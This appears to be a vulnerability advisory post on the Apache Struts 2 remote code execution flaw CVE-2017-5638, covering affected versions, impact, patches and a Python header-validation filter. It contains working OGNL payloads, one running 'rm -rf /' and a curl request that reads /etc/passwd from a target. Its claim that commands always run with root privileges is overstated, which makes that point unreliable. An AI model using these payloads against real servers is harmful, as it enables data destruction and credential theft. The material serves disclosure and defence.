How the mentioned CVE works:
The CVE-2017-5638 vulnerability resides in the Jakarta Multipart parser of Apache Struts 2. The exploit is triggered when a malicious `Content-Type` header is sent with a file upload request. The parser incorrectly processes the header’s `Content-Disposition` and `Content-Type` values, evaluating them as Object-Graph Navigation Language (OGNL) expressions. This happens because the parser’s exception handling builds a detailed error message that includes the offending header value, and that message is then evaluated as an OGNL expression. An attacker can craft a request where the `Content-Type` header contains an OGNL expression, such as %{(_='multipart/form-data').(_memberAccess['allowStaticMethodAccess']=true).(@java.lang.Runtime@getRuntime().exec('rm -rf /'))}. This expression is evaluated on the server side with root privileges, allowing the attacker to execute arbitrary system commands and leading to full server compromise.
DailyCVE Form:
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability: Remote Code Execution
Severity: Critical
Date: 2017-03-07
Prediction: Patch Available
What Undercode Says:
`curl -H "Content-Type: %{(_='multipart/form-data').(_memberAccess['allowStaticMethodAccess']=true).(@java.lang.Runtime@getRuntime().exec('cat /etc/passwd'))}" http://target/upload.action`
How to Exploit:
Craft malicious HTTP request with OGNL expression in Content-Type header to achieve unauthenticated RCE.
Protection from this CVE:
Upgrade to Struts 2.3.32 or 2.5.10.1, or apply the vendor patch. Use input validation filters on the `Content-Type` header.
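As an added example (not code from the original post or from the Struts project), the following Python filter shows what an input validation layer for this bug looks like: it accepts only syntactically valid media types and rejects anything carrying an OGNL expression marker, then runs the same check over a few constructed log lines. The log format and the `check_content_type`/`scan_log` names are assumptions made here.

```python
import re

# The vulnerable Struts parser echoed a malformed Content-Type header into an
# error message that was then evaluated as OGNL. A strict media-type check in
# front of the application drops that whole class of header before it arrives.

TOKEN = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"           # RFC 7230 token characters
QUOTED = r'"(?:[^"\\]|\\.)*"'                        # quoted-string parameter value
MEDIA_TYPE_RE = re.compile(
    rf"^{TOKEN}/{TOKEN}(?:\s*;\s*{TOKEN}=(?:{TOKEN}|{QUOTED}))*\s*$"
)
OGNL_MARKER_RE = re.compile(r"[%$#]\{")             # %{...}, ${...}, #{...}
MAX_LEN = 256                                        # a real media type is short

def check_content_type(value: str) -> tuple[bool, str]:
    """Return (accepted, reason); reject OGNL markers even inside quoted values."""
    if len(value) > MAX_LEN:
        return False, "header too long"
    if OGNL_MARKER_RE.search(value):
        return False, "OGNL expression marker"
    if not MEDIA_TYPE_RE.match(value):
        return False, "not a valid media type"
    return True, "ok"

# Constructed sample log lines (not real traffic): '<client> "<method> <path>" <content-type>'
SAMPLE_LOG = """\
10.0.0.5 "POST /upload.action" multipart/form-data; boundary=----abc123
10.0.0.9 "POST /upload.action" %{(#a='constructed-test')}
10.0.0.7 "POST /api" application/json
10.0.0.8 "POST /upload.action" multipart/form-data; boundary="${#x}"
"""

def scan_log(text: str) -> list[tuple[str, str]]:
    """Return (client, reason) for every request whose Content-Type is rejected."""
    hits = []
    for line in text.splitlines():
        client, _, rest = line.partition(' "')
        _, _, content_type = rest.partition('" ')
        ok, reason = check_content_type(content_type)
        if not ok:
            hits.append((client, reason))
    return hits

if __name__ == "__main__":
    for client, reason in scan_log(SAMPLE_LOG):
        print(f"{client}: rejected Content-Type ({reason})")
```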
Impact:
Complete system takeover, data theft, or enrolment of the server in a botnet.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

